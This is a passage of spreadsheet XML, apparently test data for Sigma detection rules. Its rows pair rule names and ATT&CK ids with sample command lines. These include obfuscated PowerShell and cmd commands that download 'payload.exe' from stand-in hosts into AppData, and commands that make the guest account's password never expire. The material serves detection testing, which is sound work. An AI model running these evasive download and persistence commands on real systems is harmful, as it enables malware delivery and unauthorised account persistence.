          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E841" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F841" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G841" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H841" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I841" s="44" t="n"/>
      <c r="J841" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K841" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="842" ht="15.75" customHeight="1" s="42">
      <c r="A842" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B842" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C842" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D842" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E842" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F842" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G842" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H842" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I842" s="44" t="n"/>
      <c r="J842" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K842" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="843" ht="15.75" customHeight="1" s="42">
      <c r="A843" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B843" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C843" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D843" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E843" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMANd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F843" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G843" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H843" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I843" s="44" t="n"/>
      <c r="J843" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K843" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="844" ht="15.75" customHeight="1" s="42">
      <c r="A844" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B844" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C844" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D844" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E844" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMand "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F844" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G844" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H844" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I844" s="43" t="n"/>
      <c r="J844" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K844" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="845" ht="15.75" customHeight="1" s="42">
      <c r="A845" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B845" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C845" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D845" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E845" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F845" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G845" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H845" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I845" s="43" t="n"/>
      <c r="J845" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K845" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="846" ht="15.75" customHeight="1" s="42">
      <c r="A846" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B846" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C846" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D846" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E846" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F846" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G846" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H846" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I846" s="44" t="n"/>
      <c r="J846" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K846" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="847" ht="15.75" customHeight="1" s="42">
      <c r="A847" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B847" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C847" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D847" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E847" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F847" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G847" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H847" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I847" s="43" t="n"/>
      <c r="J847" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K847" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="848" ht="15.75" customHeight="1" s="42">
      <c r="A848" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B848" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C848" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D848" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E848" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F848" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G848" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H848" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I848" s="44" t="n"/>
      <c r="J848" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K848" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="849" ht="15.75" customHeight="1" s="42">
      <c r="A849" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B849" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C849" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D849" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E849" s="44" t="inlineStr">
        <is>
          <t>powershell /"c" "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F849" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G849" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H849" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I849" s="44" t="n"/>
      <c r="J849" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K849" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="850" ht="15.75" customHeight="1" s="42">
      <c r="A850" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B850" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C850" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D850" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E850" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F850" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G850" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H850" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I850" s="43" t="n"/>
      <c r="J850" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K850" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="851" ht="15.75" customHeight="1" s="42">
      <c r="A851" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B851" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C851" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D851" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E851" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F851" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G851" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H851" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I851" s="44" t="n"/>
      <c r="J851" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K851" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="852" ht="15.75" customHeight="1" s="42">
      <c r="A852" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B852" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C852" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D852" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E852" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F852" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G852" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H852" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I852" s="44" t="n"/>
      <c r="J852" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K852" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="853" ht="15.75" customHeight="1" s="42">
      <c r="A853" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B853" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C853" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D853" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E853" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(New-Object Net.WebClient).DownloadFile('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F853" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G853" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H853" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I853" s="44" t="n"/>
      <c r="J853" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K853" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="854" ht="15.75" customHeight="1" s="42">
      <c r="A854" s="43" t="n"/>
      <c r="B854" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C854" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D854" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E854" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F854" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G854" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H854" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I854" s="44" t="n"/>
      <c r="J854" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K854" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="855" ht="15.75" customHeight="1" s="42">
      <c r="A855" s="43" t="n"/>
      <c r="B855" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C855" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D855" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E855" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F855" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G855" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H855" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I855" s="43" t="n"/>
      <c r="J855" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K855" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="856" ht="15.75" customHeight="1" s="42">
      <c r="A856" s="43" t="n"/>
      <c r="B856" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C856" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D856" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E856" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl h^tt^ps://example.com/file.exe -o %AP^PDATA%\file.exe"</t>
        </is>
      </c>
      <c r="F856" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G856" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H856" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I856" s="43" t="n"/>
      <c r="J856" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K856" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="857" ht="15.75" customHeight="1" s="42">
      <c r="A857" s="43" t="n"/>
      <c r="B857" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C857" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D857" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E857" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F857" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G857" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H857" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I857" s="43" t="n"/>
      <c r="J857" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K857" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="858" ht="15.75" customHeight="1" s="42">
      <c r="A858" s="43" t="n"/>
      <c r="B858" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C858" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D858" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E858" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "set protocol=http&amp;&amp; set url=://example.com/file.exe&amp;&amp; set dest=%USERPROFILE%\AppData\Roaming\file.exe&amp;&amp; call curl %protocol%%url% -o %dest%"</t>
        </is>
      </c>
      <c r="F858" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G858" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H858" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I858" s="43" t="n"/>
      <c r="J858" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K858" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="859" ht="15.75" customHeight="1" s="42">
      <c r="A859" s="43" t="n"/>
      <c r="B859" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C859" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D859" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E859" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F859" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G859" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H859" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I859" s="43" t="n"/>
      <c r="J859" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K859" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="860" ht="15.75" customHeight="1" s="42">
      <c r="A860" s="43" t="n"/>
      <c r="B860" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C860" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D860" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E860" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "curl http://example.com/payload.exe -o %USERPROFILE%\AppData\Roaming\payload.exe"</t>
        </is>
      </c>
      <c r="F860" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G860" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H860" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I860" s="43" t="n"/>
      <c r="J860" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K860" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="861" ht="15.75" customHeight="1" s="42">
      <c r="A861" s="43" t="n"/>
      <c r="B861" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C861" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D861" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E861" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "curl http://example.local/test.txt -o C:\Users\Public\AppData\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F861" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G861" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H861" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I861" s="44" t="n"/>
      <c r="J861" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K861" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="862" ht="15.75" customHeight="1" s="42">
      <c r="A862" s="43" t="n"/>
      <c r="B862" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C862" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D862" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E862" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set A=App&amp;&amp; set D=Data&amp;&amp; cmd /c curl h^ttp://example.local/test.txt -o %USERPROFILE%\%A%%D%\Roaming\test.txt"</t>
        </is>
      </c>
      <c r="F862" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G862" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H862" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I862" s="44" t="n"/>
      <c r="J862" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K862" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="863" ht="15.75" customHeight="1" s="42">
      <c r="A863" s="43" t="n"/>
      <c r="B863" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C863" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D863" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E863" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F863" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G863" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H863" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I863" s="43" t="n"/>
      <c r="J863" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K863" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="864" ht="15.75" customHeight="1" s="42">
      <c r="A864" s="43" t="n"/>
      <c r="B864" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C864" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D864" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E864" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:oN /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F864" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G864" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H864" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I864" s="44" t="n"/>
      <c r="J864" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K864" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="865" ht="15.75" customHeight="1" s="42">
      <c r="A865" s="43" t="n"/>
      <c r="B865" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C865" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D865" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E865" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /v:on /c "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F865" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G865" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H865" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I865" s="44" t="n"/>
      <c r="J865" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K865" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="866" ht="15.75" customHeight="1" s="42">
      <c r="A866" s="43" t="n"/>
      <c r="B866" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C866" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D866" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E866" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /v:ON /C "curl http://example.com/payload.exe -o !AppData!\payload.exe"</t>
        </is>
      </c>
      <c r="F866" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G866" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H866" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I866" s="43" t="n"/>
      <c r="J866" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K866" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="867" ht="15.75" customHeight="1" s="42">
      <c r="A867" s="43" t="n"/>
      <c r="B867" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C867" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D867" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E867" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \"$env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F867" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G867" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H867" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I867" s="44" t="n"/>
      <c r="J867" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K867" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="868" ht="15.75" customHeight="1" s="42">
      <c r="A868" s="43" t="n"/>
      <c r="B868" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C868" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D868" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E868" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnd "Invoke-WebRequest -Uri 'http://example.com/payload.exe' -OutFile \" $env:APPDATA\payload.exe\""</t>
        </is>
      </c>
      <c r="F868" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G868" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H868" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I868" s="44" t="n"/>
      <c r="J868" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K868" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="869" ht="15.75" customHeight="1" s="42">
      <c r="A869" s="43" t="n"/>
      <c r="B869" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C869" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D869" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
